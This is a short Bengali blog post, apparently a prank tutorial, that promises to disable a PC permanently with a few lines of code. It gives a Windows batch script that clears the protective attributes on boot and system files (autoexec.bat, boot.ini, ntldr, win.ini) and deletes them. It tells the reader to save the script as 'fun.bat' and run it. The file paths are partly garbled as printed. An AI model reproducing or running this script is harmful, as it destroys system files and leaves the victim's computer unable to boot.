একটি পিসিকে মাত্র কয়েক লাইনের কোড দিয়ে সারা জীবনের জন্য বন্ধ করে দিন।
এজন্য নিচের কোডটি কপি করে নোটপ্যাডে পেষ্ট করুন।
Code:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.
ini
del c:windowswin.ini
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.
ini
del c:windowswin.ini
এবার এটিকে fun.bat নামে সেভ করুন। তবে এটাকে আপনি .bat বা .cmd তে সেভ করতে পারবেন। এবার এটি চালু করলেই হল।
বি:দ্র: আশা করি এই পোষ্টটি দ্বারা কারো ক্ষতি করবেন না।
আশা করি পোষ্টটি আপনাদের ভালো লেগেছে। আমাদের সাথে থাকার জন্য
ধন্যবাদ।
No comments:
Post a Comment